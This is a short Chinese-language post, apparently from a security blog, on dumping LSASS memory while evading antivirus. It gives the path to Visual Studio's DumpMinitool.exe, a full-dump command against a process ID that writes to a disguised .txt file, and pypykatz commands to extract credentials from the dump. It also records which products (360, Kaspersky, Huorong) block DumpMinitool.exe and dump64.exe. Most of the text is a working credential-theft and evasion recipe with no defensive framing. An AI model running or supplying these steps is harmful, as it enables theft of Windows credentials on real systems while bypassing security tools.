免杀技术-dump lsass实测
2023-02-18 16:42:19 时间
DumpMinitool.exe
经测试,360和卡巴拦截,火绒正常
Visual Studio 2022 的一个程序,使用这个需要安装扩展开发
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe使用命令
DumpMinitool.exe --file c:\users\public\test.txt --processId PID --dumpType Full
# 读取
pip install pypykatz
pypykatz lsa minidump 111.txt360拦截
卡巴斯基拦截
火绒不拦截
dump64.exe
卡巴斯基拦截,火绒和360不拦截
360不拦截
火绒不拦截